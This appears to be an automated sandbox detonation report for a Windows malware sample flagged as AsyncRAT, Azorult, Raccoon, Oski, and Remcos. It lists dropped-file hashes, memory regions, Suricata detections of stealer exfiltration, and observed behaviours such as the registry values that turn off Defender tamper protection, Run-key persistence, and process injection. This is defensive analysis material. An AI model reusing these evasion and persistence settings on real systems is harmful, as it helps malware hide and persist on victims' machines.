SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1088-189-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1088-188-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1628-184-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1816-183-0x000000000040616E-mapping.dmp

memory/1712-182-0x0000000002160000-0x000000000217F000-memory.dmp

memory/1816-180-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1768-196-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1816-193-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/636-174-0x0000000000000000-mapping.dmp

memory/1572-172-0x0000000000000000-mapping.dmp

memory/1712-170-0x0000000004A50000-0x0000000004AC2000-memory.dmp

memory/1764-164-0x00000000004019E4-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\tmpFF26.tmp

MD5 ac9ba09a7d6fa1b7b28bdfccb8891315
SHA1 911e075176c36daeee8ea457939b56385de09fc2
SHA256 e8eaba3b34b3aa0b45fc3258cbfdd20dff2432a2e5c130fc194ac37d619fc5a9
SHA512 67c0247df9fbb06a14bd794513fa9354bf9551eaa8b69926988e74452fed5c46b4c8dd2e6e21a4bcff651b70ee99f3c19605044509a4f98cde4ac75fd17e55b2

memory/744-203-0x0000000000000000-mapping.dmp

memory/1080-206-0x0000000000400000-0x0000000000412000-memory.dmp

\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Windows\temp\eiyxrtf0.inf

MD5 ff83a2f7aa0a0f76adc23a780e4a77ba
SHA1 654a2a6496c713b2458bcb754ec78f1fad61a60e
SHA256 45d6214a004a317c16170ce72c1a12bd8a875e621cbfd6a3d56e8d13198fd186
SHA512 1fec7dbe17d1e222e3ff7f43e4a9e6181f61e3a0c269e2e5b2dab598cb1e1dd21af1ee718c14b914263cc1ee1d61907577d392c148b01990bfb33f2fcbd3b551

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1080-208-0x000000000040C71E-mapping.dmp

memory/1080-210-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1816-212-0x00000000047D0000-0x00000000047D1000-memory.dmp

memory/1816-213-0x00000000047D5000-0x00000000047E6000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

memory/1520-219-0x0000000000000000-mapping.dmp

memory/1696-220-0x0000000000000000-mapping.dmp

memory/1080-222-0x00000000042B0000-0x00000000042B1000-memory.dmp

memory/980-223-0x0000000000000000-mapping.dmp

memory/980-224-0x00000000001B0000-0x00000000001B1000-memory.dmp

memory/992-230-0x00000000004019E4-mapping.dmp

memory/1900-233-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-13 07:57

Reported

2021-08-13 08:02

Platform

win10v20210410

Max time kernel

152s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Downloads MZ/PE file

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3152 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3152 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3152 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3152 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3152 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3152 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
